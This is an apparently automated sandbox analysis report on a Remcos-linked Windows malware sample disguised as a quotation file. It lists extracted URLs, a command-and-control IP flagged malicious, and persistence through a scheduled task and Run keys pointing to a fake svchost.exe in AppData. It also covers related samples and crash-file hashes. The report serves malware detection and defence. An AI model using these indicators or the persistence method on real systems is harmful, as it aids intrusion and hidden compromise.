https://account.live.com/inlinesignup.aspx?iww=1&id=80601	svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600	svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80603	svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd84	svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpl	vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0n	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80605	svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80604	svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/msangcwam	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765186757.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpCt	vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imvu.com	vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trusten	svchost.exe, 0000001F.00000003.3655978319.0000013DBB137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656004311.0000013DBB13A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656111087.0000013DBB141000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656988856.0000013DBB143000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf	svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://passport.net/tb	svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.25.dr	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-	svchost.exe, 0000001F.00000003.1815397781.0000013DBB12B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf/	svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	svchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre	svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/Wizard/Password/Change?id=80601	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80601	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.	svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/accounts/servicelogin	vbc.exe	false		high
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfi	svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80605	svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE	svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80603	svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80604	svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsofh	svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd	svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ebuddy.com	vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.245.208.13	unknown	United States		36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands		8455	ATOM86-ASATOM86NL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435939
Start date and time:	2024-05-03 13:12:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION#30810.exe
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winEXE@77/31@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 153 Number of non-executed functions: 166
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 40.126.24.146, 40.126.24.83, 20.190.152.19, 40.126.24.147, 40.126.24.81, 20.190.152.20, 20.190.152.22, 40.126.24.82, 20.42.73.29, 20.189.173.22
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:13:28	Task Scheduler	Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
13:13:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
13:13:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
13:13:51	API Interceptor	3x Sleep call for process: WerFault.exe modified
13:14:25	API Interceptor	4255328x Sleep call for process: vbc.exe modified
13:16:52	API Interceptor	1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.245.208.13	QUOTATION#30082.exe	Get hash	malicious	Remcos	Browse
	ESN7N5cwzZ.exe	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Specification-Glycyrrhetic Acid 3-O-Glucuronide.exe	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Remcos, DBatLoader	Browse
178.237.33.50	proof of payment.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	fatura.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	proof of paymentt.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	GVV.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	proof of payment.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	fatura.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	proof of paymentt.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	GVV.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	s9ZjvgSMt1.rtf	Get hash	malicious	Unknown	Browse	192.3.101.142
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	citat #05022024.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.18
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.101.142
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	ls3wzs2VQr.rtf	Get hash	malicious	Unknown	Browse	107.175.242.96
	PO 2_5_24.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101
	er).xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.109.135
ATOM86-ASATOM86NL	proof of payment.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	fatura.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	proof of paymentt.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	GVV.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_6413c1d758d05ac66ec1e932ad11c4ede3c5baec_e985c620_ab02bc0d-5004-4913-b03b-cd02929db587\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9943818808352229
Encrypted:	false
SSDEEP:	192:yKhHu1TB0uvduAaKTtrUrzuiFeZ24lO8qH:PHu1TCuvd1aMtr6zuiFeY4lO8qH
MD5:	D45C1A555B2817DA85F3713F4D63C65B
SHA1:	4A200DC5FAAC6DC613DB079894982D2D11633042
SHA-256:	F74FACF634450810433929D3404714B23AAC5E05FFC36150F765C91C4D39F3FE
SHA-512:	BE805921C8152F9E6522CFFD53E37B282F62E9AADCD0BB32A98AEDCDC1221836D285181D3B3AA155A72BABCFB644287F0777E3D5FE6F1B27BFC3A22F702CC1E9
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.2.1.9.1.8.1.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.3.3.1.6.8.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.0.2.b.c.0.d.-.5.0.0.4.-.4.9.1.3.-.b.0.3.b.-.c.d.0.2.9.2.9.d.b.5.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.2.c.5.6.e.a.-.3.e.a.a.-.4.5.6.e.-.a.5.3.3.-.a.d.0.2.4.2.1.2.0.c.c.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.u.v.i.n.i.p.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.d.4.-.0.0.0.1.-.0.0.1.4.-.d.d.7.3.-.1.7.e.d.4.a.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.7.3.a.1.6.6.0.9.f.9.7.1.d.2.b.d.7.9.b.8.f.0.2.c.7.b.3.6.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.a.5.8.3.b.2.e.0.3.a.c.3.a.7.a.d.6.9.8.e.f.8.7.2.2.f.e.3.0.d.5.b.6.7.f.3.a.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_6413c1d758d05ac66ec1e932ad11c4ede3c5baec_e985c620_e3b4bcab-41f1-4d9c-8e7a-1e4df3abbd61\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.001557588490307
Encrypted:	false
SSDEEP:	192:ot6s1xB0uvduAa+TOPnazuiFeZ24lO8qH:A6s1xCuvd1aaOPazuiFeY4lO8qH
MD5:	B68FF65E86E6B6B5A36939AC392BB47F
SHA1:	C62BBFC1F76AB1273F9D5ECB6AEAE111F79738DC
SHA-256:	E20B854241A8A747E208614DDBE5ADACAD187C01FC247DE94694398F9C4AE50F
SHA-512:	D59EFF449E950C2DD8AE78EE0D375F73080E513828393CC4EF0B7059F763828C28F85700A33FD643FEDF9AA6D9D3B5B9DB72574A6D892512746F524E9E96D1D6
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.3.2.5.3.8.3.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.0.8.4.2.8.6.4.4.4.5.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.b.4.b.c.a.b.-.4.1.f.1.-.4.d.9.c.-.8.e.7.a.-.1.e.4.d.f.3.a.b.b.d.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.0.a.7.7.a.f.-.3.7.7.f.-.4.9.b.8.-.b.6.f.8.-.0.d.e.5.c.2.5.a.d.3.a.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.u.v.i.n.i.p.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.8.-.0.0.0.1.-.0.0.1.4.-.4.1.1.5.-.9.0.e.c.4.a.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.7.3.a.1.6.6.0.9.f.9.7.1.d.2.b.d.7.9.b.8.f.0.2.c.7.b.3.6.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.a.5.8.3.b.2.e.0.3.a.c.3.a.7.a.d.6.9.8.e.f.8.7.2.2.f.e.3.0.d.5.b.6.7.f.3.a.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_a87cad5a9d7cd3eaa526cd4c3d9022aa107d4af_e985c620_8737a0d3-176e-49ae-9fbf-3c034a98ab5f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0113301490141229
Encrypted:	false
SSDEEP:	192:7OzX1ngi0LCDnaKTtrU1zuiFeZ24lO82H:qzX1nGLCDnaMtrczuiFeY4lO82H
MD5:	9B45AFDE5D174765AEDBB66D5B1E7119
SHA1:	CACC92809F01C560C6BAD4EC9F639A4CF3F2B73A
SHA-256:	4EDF974BC2C7C6260FF0B60AB05F687287B0E5826FEFE20A5D87D77C3380FF45
SHA-512:	C1EF8398E1530261E8B5135B951F3091E84C615A241389A1FC9E71C9225AF046749C3A4A46C863FEE217976B277E9E86B9031A97881980EFD1D549BF973E649B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.2.0.8.4.3.8.7.0.7.5.4.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.2.0.8.4.3.9.4.5.7.5.3.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.3.7.a.0.d.3.-.1.7.6.e.-.4.9.a.e.-.9.f.b.f.-.3.c.0.3.4.a.9.8.a.b.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.0.3.1.9.f.6.-.0.8.1.0.-.4.4.9.f.-.8.6.a.a.-.2.5.1.7.c.8.6.2.d.a.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.u.v.i.n.i.p.i.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.c.-.0.0.0.1.-.0.0.1.4.-.f.b.a.7.-.b.a.f.7.4.a.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.7.3.a.1.6.6.0.9.f.9.7.1.d.2.b.d.7.9.b.8.f.0.2.c.7.b.3.6.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.a.5.8.3.b.2.e.0.3.a.c.3.a.7.a.d.6.9.8.e.f.8.7.2.2.f.e.3.0.d.5.b.6.7.f.3.a.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1988.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Fri May 3 11:13:42 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	427630
Entropy (8bit):	3.286424552093867
Encrypted:	false
SSDEEP:	3072:29FUcSWDcEc1CCqQRPX3+vVIc4O3x41lE6CTwlw+/BR:27gxqQRPX3QVIc4oZwl
MD5:	365963B3C0DDEB4BC697EFBCAA08691C
